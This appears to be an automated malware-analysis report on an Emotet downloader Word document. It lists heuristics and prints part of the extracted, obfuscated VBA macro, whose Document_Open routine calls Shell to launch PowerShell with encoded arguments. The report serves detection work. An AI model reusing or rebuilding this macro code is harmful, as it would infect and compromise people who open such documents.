MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample contains VBA macros, including a Document_Open auto-execution macro that utilizes the Shell() function. This indicates an attempt to download and execute a second-stage payload. ClamAV detection explicitly names this as Emotet, a known downloader family.
Heuristics 6
-
ClamAV: Doc.Downloader.Emotet-6877382-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6877382-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16451 bytes |
SHA-256: c10e677ca163f1e752253bf5bbeb9b221e5ae1f06e7e1ab737e9dd05b5164af4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "zvBTHhZiXunAaS"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function TnAkb()
On Error Resume Next
djrdu = 53500 + NCBbSD + (45010 * CDbl(WbbDY) - Tmhnta / CSng(5607) - AzYVp / Hex(rvUItc) + 71818 - 14223)
ZziVE = Sqr(28700)
sSAfJz = qABXM - EDwOm / 27228 / GTJvJM - 223327908 + Hex(InOEwm) * FFUJb - Round(89928)
KKASis = lWTWZ
oZIEWz = 37900 + DlwYZ + (92545 * CDbl(zcEKTp) - MRqkGY / CSng(73675) - wWHwRj / Hex(Qnibkb) + 41115 - 91607)
zJGYaM = Sqr(45916)
wMMrO = qvPSna - biSBL / 32504 / sFBqVJ - 223327908 + Hex(zROJlw) * zFTFCA - Round(76016)
iHsFZF = VCQiq
KWVFBt = 57011 + IBcjb + (49821 * CDbl(wJQtMj) - IAtNTi / CSng(83393) - qHFGuz / Hex(wzuBUz) + 62078 - 85843)
wEoaFf = Sqr(95315)
JRNUL = azJNLV - VfCMMQ / 98034 / PtcIK - 223327908 + Hex(OqQpK) * nwckO - Round(71739)
VIhVPX = nWOvqi
OwHtYk = 24582 + XLJsY + (374 * CDbl(nZDSw) - GiIFHH / CSng(70475) - qpEDz / Hex(LjCDzB) + 70333 - 74918)
tRNUM = Sqr(37880)
VTORI = woRcc - hVEpbD / 743 / WzSwq - 223327908 + Hex(VOntm) * jpTlo - Round(61527)
UCKlV = HaYlN
TnAkb = bsoshUSH + VBA.Shell(IEYZXV + Chr(WqvbPTbYGtP + vbKeyP + aJNTzabBdkw) + "owers" + vvhoiOiw + MBMLXoVl + coAVE + hcqsppXqvr + dlpCMXIVLXv + npsESALX, 5839 - 5839)
MiWAR = 50223 + wkAYqD + (26147 * CDbl(CTAvQJ) - JNwXD / CSng(26005) - ZLHVNX / Hex(zkWFw) + 86833 - 94931)
NjWZN = Sqr(70234)
brBCm = JEuWb - KpRUq / 81099 / EiipRQ - 223327908 + Hex(wzPBdz) * DjQUKl - Round(80702)
rhNmWZ = FmpcmR
nzBjmJ = 47786 + otsbQ + (12479 * CDbl(BAfFq) - CCGul / CSng(79916) - CEVuT / Hex(QmOlY) + 52503 - 32922)
riquOj = Sqr(32254)
LzipOl = voAUzG - XzIzqT / 74348 / HdZmK - 223327908 + Hex(PzXJI) * tWQdE - Round(60062)
jbjWin = wLfjj
End Function
Private Sub Document_open()
On Error Resume Next
IvsAPc = 51348 + jpcLrz + (81834 * CDbl(hfsKc) - TjWIO / CSng(5283) - WNGSL / Hex(ziPNcE) + 32611 - 73777)
uvaYR = Sqr(19747)
GYfUp = IdHNXS - bWsfA / 86449 / SSQGL - 223327908 + Hex(Mpaipl) * KHimqJ - Round(40404)
SwXHRX = LsmQq
soHZJH = 30973 + DZXmU + (99000 * CDbl(nFpqX) - jMCZM / CSng(10566) - QXnRNK / Hex(TaNjB) + 9437 - 5465)
jquicK = Sqr(71029)
FhAmMb = zzCiC - lGZJhB / 24394 / IoTwwj - 223327908 + Hex(fidXf) * ikMYGr - Round(42163)
lFOjw = fYDuYY
TnAkb
zshnN = 90967 + UOZLXF + (7384 * CDbl(MkbJq) - Ypwwul / CSng(53214) - NhOHU / Hex(sfkswc) + 88089 - 40338)
KdzqPI = Sqr(70072)
zhaZD = pSJRJB - zPkTcj / 99395 / NNkDOm - 223327908 + Hex(zvMBc) * PZuLp - Round(90863)
jzWAD = kVUvIY
llTqWo = 96849 + VOEIY + (56297 * CDbl(pqInlE) - bCAji / CSng(48158) - jXaZs / Hex(dGDoAw) + 49852 - 6698)
GcuGi = Sqr(45330)
Ozrjb = RpmJZ - mqiij / 710 / jmTmo - 223327908 + Hex(GCvYpY) * jMIahL - Round(3089)
ZmLkTj = NNXmc
End Sub
Attribute VB_Name = "oNCqXMRhct"
Function vvhoiOiw()
On Error Resume Next
zzTjo = Sqr(36363)
tHAkTw = 16527 + FaozwK + (11468 * CDbl(UJpmw) - PVmHuH / CSng(43666) - MtaUCO / Hex(TGfrk) + 6647 - 46238)
fQvFs = wMEAPN - uXiHr / 99156 / DJvLl - 223327908 + Hex(wmHbbh) * COJYz - Round(42557)
IzNzw = mKnUVC
uJpAbEBHRb = "HeLL ( (" + " 4" + "6 ,100 ,96 ,123" + " , 94, 102" + ", 105 ,42 " + ",55 ,42, 100" + ", 111" + ",125 ,39," + " 101," + " 104, 9"
QnBzwP = Sqr(32383)
RHVUjT = 3046 + LEdZho + (23265 * CDbl(NFKVJf) - iFqvh / CSng(35582) - lPmsH / Hex(sppdUG) + 19481 - 79389)
Tflzn = sYURA - NnohR / 78255 / PhACV - 223327908 + Hex(koDtj) * uUPSN - Round(40702)
VtbqVp = dcVLp
nawllioajlA = "6 , 111,105 ,12" + "6 , 4" + "2, 120,107 ,10" + "0 ,110 ,1" + "01" + ",103" + ", 49,46,1" + "04 , 96, 64, "
aPtCY = Sqr(74486)
IrBTTc = 31087 + Dapikv + (12502 * CDbl(wUbMUk) - SbANMz / CSng(98881) - EaDNC / Hex(vzkES) + 2295 - 97703)
XHLYt = rTPDjD - lEhiD / 58351 / VrHBi - 223327908 + Hex(KBlTJZ) * CjSrp - Round(17375)
EZzFAp = WkdzT
ZQLca = "82," + "125,89,42 , " + "55" + " ,42 ,100,11" + "1,1" + "25, 39,101" + ",104 " + ",96, 111 , 105"
HfFVR = Sqr(7135
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.